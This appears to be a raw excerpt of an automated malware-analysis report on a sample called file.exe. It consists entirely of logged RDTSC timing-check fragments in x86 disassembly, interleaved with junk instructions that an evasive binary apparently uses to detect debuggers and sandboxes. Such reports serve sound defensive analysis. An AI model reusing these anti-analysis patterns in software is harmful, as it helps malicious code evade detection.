                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59106 second address: F591A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007FC2C8B95C7Bh 0x0000000b pop edi 0x0000000c popad 0x0000000d nop 0x0000000e sub bl, FFFFFFAFh 0x00000011 push dword ptr fs:[00000000h] 0x00000018 pushad 0x00000019 mov ebx, dword ptr [ebp+122D36C2h] 0x0000001f movzx edi, di 0x00000022 popad 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a mov dword ptr [ebp+122D312Ch], esi 0x00000030 jmp 00007FC2C8B95C80h 0x00000035 mov eax, dword ptr [ebp+122D05F1h] 0x0000003b adc edi, 49CFD422h 0x00000041 push FFFFFFFFh 0x00000043 push edi 0x00000044 mov bl, 7Fh 0x00000046 pop ebx 0x00000047 or dword ptr [ebp+122D3388h], ecx 0x0000004d nop 0x0000004e pushad 0x0000004f js 00007FC2C8B95C8Bh 0x00000055 jmp 00007FC2C8B95C85h 0x0000005a push ebx 0x0000005b jmp 00007FC2C8B95C88h 0x00000060 pop ebx 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push esi 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A1C2 second address: F5A1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C194 second address: F5C19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5D0AD second address: F5D0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5DF7E second address: F5DF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5D0B1 second address: F5D0BF instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC2C9384956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5EDA8 second address: F5EDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5EDAC second address: F5EDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E058 second address: F5E0DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx ebx, di 0x0000000c push dword ptr fs:[00000000h] 0x00000013 jmp 00007FC2C8B95C84h 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FC2C8B95C78h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 jmp 00007FC2C8B95C84h 0x0000003e mov eax, dword ptr [ebp+122D165Dh] 0x00000044 push FFFFFFFFh 0x00000046 pushad 0x00000047 mov cx, dx 0x0000004a and eax, dword ptr [ebp+122D1B29h] 0x00000050 popad 0x00000051 nop 0x00000052 jo 00007FC2C8B95C80h 0x00000058 pushad 0x00000059 push edx 0x0000005a pop edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E0DC second address: F5E0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FC2C9384956h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FD06 second address: F5FD55 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov di, si 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FC2C8B95C78h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D3256h], ebx 0x00000030 or dword ptr [ebp+122D3450h], ebx 0x00000036 push eax 0x00000037 jg 00007FC2C8B95C95h 0x0000003d push eax 0x0000003e push edx 0x0000003f jo 00007FC2C8B95C76h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F60CF4 second address: F60D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2C938495Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FF48 second address: F5FF5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B95C83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61D0E second address: F61D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC2C8B99096h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F62C51 second address: F62C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64C59 second address: F64C7F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC2C8B990A3h 0x00000008 jmp 00007FC2C8B9909Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jc 00007FC2C8B990A8h 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007FC2C8B99096h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64C7F second address: F64C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F66A8B second address: F66A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F66A95 second address: F66AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FC2C8DD5F03h 0x0000000f jmp 00007FC2C8DD5EFDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F66AB1 second address: F66B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c mov dword ptr [ebp+1244756Ch], edx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FC2C8B99098h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 pop eax 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F62D84 second address: F62D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F60F04 second address: F60F24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63D9F second address: F63DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jng 00007FC2C8DD5EF6h 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65E18 second address: F65E1E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F66BBD second address: F66BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F60F24 second address: F60F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63DB4 second address: F63DB9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67A67 second address: F67A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65E1E second address: F65E23 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6CC42 second address: F6CC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6CC47 second address: F6CC62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F06h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71A85 second address: F71A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B990A4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71A9D second address: F71AC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FC2C8DD5F09h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71AC3 second address: F71B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2C8B990A3h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC2C8B990A8h 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007FC2C8B990A6h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71C77 second address: F71CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC2C8DD5F09h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC2C8DD5F03h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71E46 second address: F71E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A6h 0x00000007 jng 00007FC2C8B99096h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77242 second address: F77262 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC2C8DD5F08h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77262 second address: F7726F instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2C8B99096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7726F second address: F772A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC2C8DD5EF6h 0x0000000a jmp 00007FC2C8DD5F01h 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 push ebx 0x00000013 push edx 0x00000014 pop edx 0x00000015 je 00007FC2C8DD5EF6h 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC2C8DD5EFBh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77C3A second address: F77C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC2C8B990A9h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77C5F second address: F77C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77C7A second address: F77C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77C7E second address: F77C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FC2C8DD5EF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7DA34 second address: F7DA4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7DA4F second address: F7DA5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC2C8DD5EF6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7C771 second address: F7C7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC2C8B99096h 0x0000000a popad 0x0000000b jmp 00007FC2C8B9909Bh 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 popad 0x00000015 pushad 0x00000016 ja 00007FC2C8B9909Ah 0x0000001c push edx 0x0000001d pop edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 push esi 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop esi 0x00000024 jc 00007FC2C8B9909Eh 0x0000002a push eax 0x0000002b pop eax 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7C7A5 second address: F7C7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7CEBA second address: F7CED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC2C8B990A7h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7CED8 second address: F7CEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7D2F6 second address: F7D302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7D302 second address: F7D308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7D308 second address: F7D30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7D30C second address: F7D31E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2C8DD5EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FC2C8DD5EF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7D31E second address: F7D332 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC2C8B99096h 0x00000008 jng 00007FC2C8B99096h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7D332 second address: F7D33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC2C8DD5EF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7D33C second address: F7D360 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007FC2C8B99096h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7D8FF second address: F7D91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2C8DD5F02h 0x0000000a pop esi 0x0000000b push ebx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8501C second address: F85047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007FC2C8B9909Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC2C8B9909Ch 0x00000016 jnl 00007FC2C8B99096h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84132 second address: F8413A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8413A second address: F84143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F845B8 second address: F845DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC2C8DD5F05h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push esi 0x0000000c jg 00007FC2C8DD5EF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8471A second address: F84735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2C8B990A5h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84735 second address: F84739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F848A6 second address: F848C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC2C8B990A2h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F848C0 second address: F848D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2C8DD5EFEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F848D2 second address: F848DC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC2C8B99096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F848DC second address: F848E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84A53 second address: F84A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31E74 second address: F31E99 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC2C8DD5F0Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31E99 second address: F31E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84E89 second address: F84E97 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84E97 second address: F84E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54794 second address: F54799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54799 second address: F547A3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC2C8B9909Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54862 second address: F54871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54871 second address: F54877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54877 second address: F548CA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC2C8DD5F07h 0x00000008 jmp 00007FC2C8DD5F01h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov dx, 10E9h 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FC2C8DD5EF8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov cx, 8581h 0x00000034 movsx edx, si 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jo 00007FC2C8DD5EF6h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F548CA second address: F548D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F548D0 second address: F548D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54D45 second address: F54D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54F55 second address: F54F5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54F5A second address: F54F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54F60 second address: F54F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC2C8DD5EFBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54F75 second address: F54FB3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC2C8B99098h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FC2C8B990A7h 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007FC2C8B9909Ch 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54FB3 second address: F54FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F550C4 second address: F550CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
